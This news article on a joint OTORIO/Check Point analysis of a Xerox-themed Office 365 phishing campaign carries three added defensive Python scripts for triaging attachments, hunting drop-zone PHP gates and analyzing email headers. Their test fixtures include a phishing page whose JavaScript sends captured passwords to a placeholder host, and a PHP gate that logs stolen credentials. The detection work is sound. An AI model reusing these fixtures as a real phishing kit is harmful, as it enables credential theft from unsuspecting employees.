OTORIO, Check Point get to the bottom of large scale email phishing campaign


Industrial cybersecurity company OTORIO recently joined forces with Check Point Research to analyze a large scale email phishing campaign that targeted thousands of global organizations, revealing the campaign’s overall infection chain, infrastructure and how the emails were distributed.

In August, attackers launched a phishing campaign whose emails masqueraded as Xerox scan notifications and prompted users to open a malicious HTML attachment, according to joint research by OTORIO and Check Point. Although the infection chain is simple, it evaded Microsoft Office 365 Advanced Threat Protection (ATP) filtering and captured the credentials of more than a thousand corporate employees, the companies added.

Phishing, credential theft and business email compromise are the three main techniques criminals rely on to get around organizations' defenses, according to data released by OTORIO and Check Point.

Verizon's Data Breach Investigations Report shows that these 'big three' account for over two-thirds (67 percent) of successful data breaches worldwide. Breaches are composed of a variety of actions, but social attacks such as phishing and pretexting dominate the incident data (incidents are events without confirmed data disclosure), Verizon said.

Cyber-espionage motivated attacks and incidents involving operational technology (OT) assets are also concerns for industrial sectors, with the mining, quarrying, oil and gas extraction, and utilities segment reporting 194 incidents, 43 of which had confirmed data disclosure.

OTORIO and Check Point research data showed that there was a wide distribution of targeted industries, but there appears to be a keen interest in energy and construction sectors. About 16.7 percent of targets were based in the construction segment, 10.7 percent were from the energy sector, 6.0 percent were from the information technology sector, and about 4.5 percent came from the healthcare market segment, according to the researchers.

The researchers' visibility into the campaign came from a simple mistake in the attack chain. The attackers exposed the credentials they had stolen to the public Internet across dozens of drop-zone servers, the joint research report said. With a simple Google search, anyone could have found the password for one of the compromised email accounts, further exposing it to other opportunistic attackers.

The attack began with one of several phishing email templates. The attacker sent an email imitating a Xerox (or "Xeros") scan notification, with the target's first name or company name in the subject line. When the victim double-clicked the attached HTML file, the default system browser displayed a blurred image with the target's email address preconfigured in the page.

Several other phishing page variants were used throughout the campaign, but the blurred background image stayed the same, the researchers said. Once the HTML file was opened, JavaScript code ran in the background of the document. The code performed simple password checks, sent the data to the attackers' drop-zone server, and then redirected the user to a legitimate Office 365 login page.

Throughout the campaign the code was continuously polished and refined, with the attackers creating a more realistic experience so that victims were less likely to become suspicious and more likely to enter their login credentials. Using these simple techniques, the attackers evaded detection by several anti-virus vendors, the researchers said.
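The attachment behaviour described above (embedded JavaScript, a password check, a POST to a PHP script on a drop-zone server, then a redirect to the real Office 365 sign-in page) is something a mail gateway or analyst can check for statically before the file ever reaches a browser. The following triage script is an added example and not code from the OTORIO/Check Point report; the indicator names, scoring threshold, the constructed sample attachment and the host names in it are assumptions made for illustration.

```python
"""Static triage of an HTML e-mail attachment for credential-phishing traits:
embedded JavaScript, a password field, a POST to a PHP gate script
(go.php, post.php, gate.php, rent.php, rest.php), obfuscation helpers, and a
redirect to the genuine Office 365 sign-in page once the data has been sent.
Added example; scoring thresholds and the sample attachment are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

GATE_SCRIPTS = {"go.php", "post.php", "gate.php", "rent.php", "rest.php"}
LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
OBFUSCATION_RE = re.compile(r"\b(unescape|atob|eval|document\.write)\s*\(")


class _Extractor(HTMLParser):
    """Collect <script> bodies, <form action> targets and <input type> values."""

    def __init__(self):
        super().__init__()
        self.scripts, self.form_actions, self.input_types = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage_html_attachment(html: str) -> dict:
    """Return the indicators found plus a coarse verdict (heuristic thresholds are ours)."""
    p = _Extractor()
    p.feed(html)
    p.close()
    js = "\n".join(p.scripts)
    urls = set(URL_RE.findall(js)) | set(p.form_actions)
    # A URL whose last path component is one of the known gate script names.
    gate_urls = sorted(u for u in urls
                       if urlparse(u).path.rsplit("/", 1)[-1].lower() in GATE_SCRIPTS)
    login_urls = [u for u in urls if urlparse(u).hostname in LEGIT_LOGIN_HOSTS]
    indicators = []
    if js.strip():
        indicators.append("embedded_javascript")
    if "password" in p.input_types:
        indicators.append("password_field")
    if gate_urls:
        indicators.append("posts_to_php_gate")
    if gate_urls and login_urls:
        indicators.append("redirect_to_real_login_after_exfil")
    if OBFUSCATION_RE.search(js):
        indicators.append("obfuscation_helper")
    verdict = ("phishing_likely" if len(indicators) >= 3
               else "review" if indicators else "clean")
    return {"indicators": indicators, "gate_urls": gate_urls, "verdict": verdict}


# Constructed look-alike of the attachment described in the article (test fixture only).
SAMPLE_PHISH = """<html><body style="background:url(blurred_scan.jpg)">
<form id="f">
  <input type="text" name="email" value="target@example.com">
  <input type="password" name="pw">
  <input type="submit" value="Open document">
</form>
<script>
document.getElementById("f").onsubmit = function (ev) {
  ev.preventDefault();
  var pw = document.getElementsByName("pw")[0].value;
  if (pw.length < 6) { return; }   // the "simple password check"
  var x = new XMLHttpRequest();
  x.open("POST", "https://compromised-site.invalid/wp-content/uploads/post.php");
  x.send("email=target@example.com&pw=" + encodeURIComponent(pw));
  window.location = "https://login.microsoftonline.com/";
};
</script></body></html>"""

# Constructed benign attachment for comparison.
SAMPLE_BENIGN = """<html><body><h1>Newsletter</h1>
<p>Read the <a href="https://www.example.com/news">latest issue</a>.</p></body></html>"""

if __name__ == "__main__":
    print(triage_html_attachment(SAMPLE_PHISH))
    print(triage_html_attachment(SAMPLE_BENIGN))
```

The gate-name check is deliberately a path match rather than a host match: the report notes the scripts lived on compromised WordPress sites, so the host is a legitimate domain with a good reputation and tells you nothing on its own.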

The campaign used both dedicated infrastructure and compromised WordPress websites as drop-zone servers, the joint research report said. The dedicated server ran for roughly two months and served dozens of registered .XYZ domains that were used in the phishing attacks.

The researchers discovered dozens of compromised WordPress servers that hosted the malicious PHP page (named "go.php", "post.php", "gate.php", "rent.php" or "rest.php") and processed all incoming credentials from victims of the phishing attacks. Attackers usually prefer compromised servers over their own infrastructure because established websites already have a reputation: the better that reputation, the lower the chance that security vendors will block the traffic.
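For anyone cleaning up one of those WordPress sites, a file-name sweep for the five script names is the obvious first step, but it is not sufficient on its own: WordPress itself ships a wp-includes/post.php and a wp-admin/post.php. The hunt script below, an added example rather than code from the report, therefore also checks each hit for the gate pattern (reads POST data and writes it to disk or mails it out). The pattern heuristics, the temporary sample tree and its file contents are constructed for illustration.

```python
"""Hunt a WordPress document root for drop-zone gate scripts. Name matching
alone gives false positives (core ships wp-includes/post.php), so every hit
is also checked for the gate pattern: reads $_POST and writes/mails it.
Added example; the heuristics and the sample tree are constructed."""
import os
import re
import tempfile

GATE_SCRIPTS = {"go.php", "post.php", "gate.php", "rent.php", "rest.php"}
POST_RE = re.compile(r"\$_(?:POST|REQUEST)\b")
SINK_RE = re.compile(r"\b(file_put_contents|fwrite|fopen|mail)\s*\(")


def find_drop_zone_candidates(root: str) -> list:
    """Return every PHP file with a gate name, flagged if it looks like a credential sink."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in GATE_SCRIPTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            reads_post = bool(POST_RE.search(src))
            sinks = sorted(set(SINK_RE.findall(src)))
            hits.append({
                "path": os.path.relpath(path, root).replace(os.sep, "/"),
                "reads_post": reads_post,
                "sinks": sinks,
                "likely_gate": reads_post and bool(sinks),
            })
    return sorted(hits, key=lambda h: h["path"])


def build_sample_tree() -> str:
    """Constructed WordPress-like tree: one gate under uploads, one innocuous
    theme file, and a stand-in for the core wp-includes/post.php."""
    root = tempfile.mkdtemp(prefix="wp-")
    files = {
        "wp-content/uploads/2020/08/post.php": (
            "<?php\n"
            "$line = $_POST['email'] . ':' . $_POST['pw'] . PHP_EOL;\n"
            "file_put_contents('result.txt', $line, FILE_APPEND);\n"
            "header('Location: https://login.microsoftonline.com/');\n"),
        "wp-content/themes/demo/rest.php": "<?php\necho 'demo';\n",
        "wp-includes/post.php": (
            "<?php\n// stand-in for the WordPress core file of this name\n"
            "function wp_insert_post_stub() {}\n"),
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for hit in find_drop_zone_candidates(build_sample_tree()):
        print(hit)
```

Any flagged script should be treated as evidence, not just deleted: the file it appends to is exactly the kind of world-readable drop file the report describes, and its contents tell you which victims to notify.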

Analyzing the different email headers used in the campaign allowed OTORIO and Check Point researchers to draw several conclusions about the attackers' tactics, techniques and procedures (TTPs), the joint research report said. Some emails were sent from a Linux server hosted on Microsoft Azure, others were sent using PHPMailer 6.1.5, and some were delivered through 1&1 email servers.

The attackers used compromised email accounts with a high reputation to distribute the spam, because such emails are harder to block. In one specific campaign, a phishing page was found impersonating IONOS by 1&1, a German web hosting company, the researchers pointed out. It is highly likely that the compromised IONOS account credentials were then used by the attackers to send the rest of the Office 365 themed spam.
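The header analysis described above comes down to three questions: which software built the message (X-Mailer), which server first injected it into the mail system (the bottom-most Received header), and whether the envelope sender agrees with the visible From. The script below, an added example and not the researchers' own tooling, answers those from a raw message; the constructed sample, the host names, IP addresses and the reverse-DNS-to-provider mapping are all placeholders chosen for illustration.

```python
"""Extract sender-infrastructure clues from raw e-mail headers: the X-Mailer
string (for example a PHPMailer version), the Received chain back to the
originating hop, a hosting-provider hint from that hop's reverse DNS, and
whether the From and Return-Path domains agree.
Added example; the message, hosts, addresses and provider hints are constructed."""
import email
import re
from email import policy
from email.utils import parseaddr

PHPMAILER_RE = re.compile(r"PHPMailer\s+(\d+(?:\.\d+)*)", re.I)
RECEIVED_FROM_RE = re.compile(r"\bfrom\s+(\S+)\s+\(([^)]*)\)", re.I)
IP_RE = re.compile(r"\[(?:IPv6:)?([0-9a-f.:]+)\]", re.I)
# Reverse-DNS suffixes mapped to a provider (heuristic, ours).
PROVIDER_HINTS = {"cloudapp.azure.com": "azure", "amazonaws.com": "aws",
                  "1and1.com": "1&1 IONOS", "ionos.com": "1&1 IONOS"}


def _domain(header_value: str) -> str:
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def analyze_headers(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    hops = []
    # Each relay prepends its own Received header, so the last one in the
    # message is the first hop: the server that actually injected the mail.
    for hdr in reversed(msg.get_all("Received") or []):
        m = RECEIVED_FROM_RE.search(" ".join(str(hdr).split()))
        if not m:
            continue
        detail = m.group(2)
        ip = IP_RE.search(detail)
        first = detail.split()[0] if detail.split() else ""
        hops.append({"helo": m.group(1),
                     "rdns": None if first.startswith("[") else first.lower(),
                     "ip": ip.group(1) if ip else None})
    origin = hops[0] if hops else {"helo": None, "rdns": None, "ip": None}
    provider = None
    if origin["rdns"]:
        provider = next((name for suffix, name in PROVIDER_HINTS.items()
                         if origin["rdns"].endswith(suffix)), None)
    mailer = str(msg.get("X-Mailer", ""))
    php = PHPMAILER_RE.search(mailer)
    from_domain = _domain(str(msg.get("From", "")))
    rp_domain = _domain(str(msg.get("Return-Path", "")))
    return {
        "hop_count": len(hops),
        "origin_helo": origin["helo"],
        "origin_rdns": origin["rdns"],
        "origin_ip": origin["ip"],
        "origin_provider": provider,
        "mailer": mailer or None,
        "phpmailer_version": php.group(1) if php else None,
        "from_domain": from_domain,
        "return_path_domain": rp_domain,
        "envelope_mismatch": bool(from_domain and rp_domain and from_domain != rp_domain),
    }


# Constructed message: a PHPMailer-built "scan notification" injected from a
# cloud VM, relayed once internally. Hosts and addresses are placeholders.
SAMPLE_RAW = """Received: from mx.victim.invalid (localhost [127.0.0.1])
  by mx.victim.invalid (Postfix) with ESMTP id 4BQ; Mon, 3 Aug 2020 09:12:01 +0000
Received: from mail.sender.invalid (vm-7.eastus.cloudapp.azure.com [203.0.113.10])
  by mx.victim.invalid (Postfix) with ESMTPS; Mon, 3 Aug 2020 09:12:00 +0000
Return-Path: <bounce@other.invalid>
From: "Xerox Scanner" <scanner@sender.invalid>
To: alice@victim.invalid
Subject: Scanned document for Alice
X-Mailer: PHPMailer 6.1.5 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body>Your scanned document is attached.</body></html>
"""

if __name__ == "__main__":
    for key, value in analyze_headers(SAMPLE_RAW).items():
        print(f"{key}: {value}")
```

Received headers are only trustworthy from the point where your own infrastructure added them; anything below the first hop your servers wrote can be forged, which is why the script reports the injecting hop rather than trusting whatever the message claims further down.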

The firms also found that once users' information reached the drop-zone servers, it was saved in a publicly visible file that Google indexed. This gave anyone access to the stolen email credentials with a simple Google search. The public availability of the data allowed the researchers to build a breakdown of victims by industry, based on a subset of about 500 stolen credentials.

The researchers also found several correlations with previous phishing activity by comparing the campaign's TTPs, the joint research report said. Given the similarities, these activities were likely carried out by the same attacker or group of attackers. They also found a phishing email from May 2020 that matched these TTPs and used the same JavaScript encoding as the August campaign.

Previously, the script redirected the user to another variant of an Office 365 phishing page that was not entirely encoded within the initial HTML file, the researchers noted.

Google naturally indexes the internet, and in doing so it also indexed the pages where the attackers temporarily stored the stolen credentials, according to the joint research report. Attackers conceal their malicious intentions, bypass security filtering and trick users. To protect against this type of attack, users should be suspicious of any email or communication from a familiar brand or organization that asks them to click a link or open an attached document.

Users must beware of lookalike domains, spelling errors in emails or websites, and unfamiliar email senders, and be cautious with files received via email from unknown senders, especially if they prompt for an action one would not usually take. They must also avoid reusing passwords across different applications and accounts. Organizations should defend against zero-day attacks with an end-to-end security architecture that blocks deceptive phishing sites and alerts on password reuse in real time.

In December, OTORIO had warned of more industrial ransomware attacks this year, as industrial companies were likely to see a rise in industrial cybercrime affecting revenue-generating operations. Ransomware surged 40 percent in 2020 as attackers realized that the industrial sector is willing to pay six-figure sums to resume revenue-generating operations, and the trend is expected to keep rising.

